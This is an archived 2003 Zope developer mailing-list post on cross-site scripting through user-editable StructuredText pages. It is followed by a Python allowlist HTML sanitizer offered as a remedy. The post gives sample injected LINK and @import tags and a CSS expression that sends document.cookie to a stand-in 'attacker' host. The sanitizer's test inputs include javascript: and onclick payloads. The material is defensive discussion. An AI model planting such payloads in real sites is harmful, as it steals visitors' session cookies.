[Zope-dev] weak examples, weak exploits

Kazuya FUKAMACHI kf@atransia.co.jp
Tue, 24 Jun 2003 00:30:55 +0900


On Mon, 23 Jun 2003 01:20:35 -0700
Jamie Heilman <jamie@audible.transient.net> wrote:

> http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt
[snip]
> apps, and apart from 1 and 3 there are probably legitimate bugs there.

related issues:

CMFWiki, ZWiki, Plone and other products are also vulnerable to 3a,
as far as the site permits anonymous users, or persons without good
references, to write.
To cope with the matter, I stupidly put in multiple string substitutions.

    import re
    def disable_iframes(t):  # (?i): case-insensitive; [^d>]* skips tags already rewritten to "<disabled ..."
        t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t)
        t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t)
        t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t)
        return t

It would be appreciated if someone could advise me of a more general
and smart way.

I know that Zope's StructuredText itself does not handle such a case,
and that kind of implementation may be left to each developer.
If it had the ability to avoid them, it would be much better, I think.

Another example:
 The following sample may allow malicious.css to be imported from outside
of the site. Put #1 or #2 in a StructuredText page.

 #1
 <LINK rel="stylesheet" href="http://attacker/malicious.css">

 #2
 <STYLE type="text/css">
 @import url('http://attacker/malicious.css');
 </STYLE>

 # example of malicious.css
  http://attacker/malicious.css
  body { left: expression(eval(
        'document.location="http://attacker/"+document.cookie;')) }

For example, make a 'Document' in a CMFDefault site,
and put #1 in the reply form (DiscussionItem) against the original
document, etc. It seems CMFDefault is vulnerable to this attack.

Any general remedy for that kind of exploit?

--
Kazuya Fukamachi
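The general remedy asked for above is normally an allowlist rather than a denylist: parse the user's HTML, re-serialize only the tags and attributes the site explicitly permits, and drop everything else, so that <iframe>, <link>, <style>, style="..." and on*= handlers never have to be enumerated. The code below is an added example written for this page; it is not code from the post, from Zope or from StructuredText. It uses Python 3's standard-library html.parser (the 2003 thread is Python 2). The allowlisted tags and attributes, the names sanitize_html and url_is_safe, and the sample inputs are my own assumptions and constructions.

```python
import re
from html import escape
from html.parser import HTMLParser

# Allowlist (an assumption of this example; tune it to what the site needs).
# Anything not listed is dropped: iframe, link, style, script, object, embed, ...
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li",
                "pre", "code", "blockquote", "h1", "h2", "h3", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "title"}}
VOID_TAGS = {"br", "img"}
# Elements whose text content is code rather than prose: drop the body as well.
DROP_WITH_CONTENT = {"script", "style"}
SAFE_SCHEMES = {"http", "https", "mailto"}


def url_is_safe(value):
    """Accept relative URLs and http/https/mailto; reject javascript:, data:, vbscript: ..."""
    # Browsers ignore control characters inside a scheme ("java\tscript:"),
    # so strip them before deciding what the scheme is.
    v = re.sub(r"[\x00-\x20]", "", value).lower()
    m = re.match(r"^([a-z][a-z0-9+.-]*):", v)
    return m is None or m.group(1) in SAFE_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Re-serialize allowlisted markup only; other tags vanish, their text survives."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []
        self.skip_depth = 0  # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # tag dropped; inner text still arrives via handle_data
        clean = []
        for name, value in attrs:
            # Unknown attributes go too: this removes style="..." and every on*= handler.
            if name not in ALLOWED_ATTRS.get(tag, ()) or value is None:
                continue
            if name in ("href", "src") and not url_is_safe(value):
                continue
            clean.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(clean)))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return
        # Close down to the matching tag so the output stays well nested.
        while self.open_tags:
            t = self.open_tags.pop()
            self.out.append("</%s>" % t)
            if t == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    # Comments, <!DOCTYPE> and <?...?>: HTMLParser's default handlers do nothing, so they are dropped.

    def result(self):
        self.close()
        while self.open_tags:  # close anything the author left open
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize_html(fragment):
    """Return a copy of `fragment` containing only allowlisted markup."""
    p = AllowlistSanitizer()
    p.feed(fragment)
    return p.result()


if __name__ == "__main__":
    # Constructed inputs: the post's #1 and #2, an iframe, and a javascript: link.
    for sample in (
        '<LINK rel="stylesheet" href="http://attacker/malicious.css">after',
        "<STYLE type=\"text/css\">\n @import url('http://attacker/malicious.css');\n</STYLE>",
        '<IFrame src="http://attacker/">framed</IFrame>',
        '<a href="javascript:alert(1)" onclick="steal()">click</a>',
        '<p style="left: expression(alert(1))">text</p> <b>unclosed',
    ):
        print(repr(sanitize_html(sample)))
```

Because the output is rebuilt from the parse rather than patched in place, mixed case (<IFrame>, <STYLE>), attribute tricks and tags the regex never thought of all fall out the same way, and text the parser does not recognize as a tag is re-escaped as text. The allowlist is the part to review per site: every tag or attribute added to it is a new surface to think about.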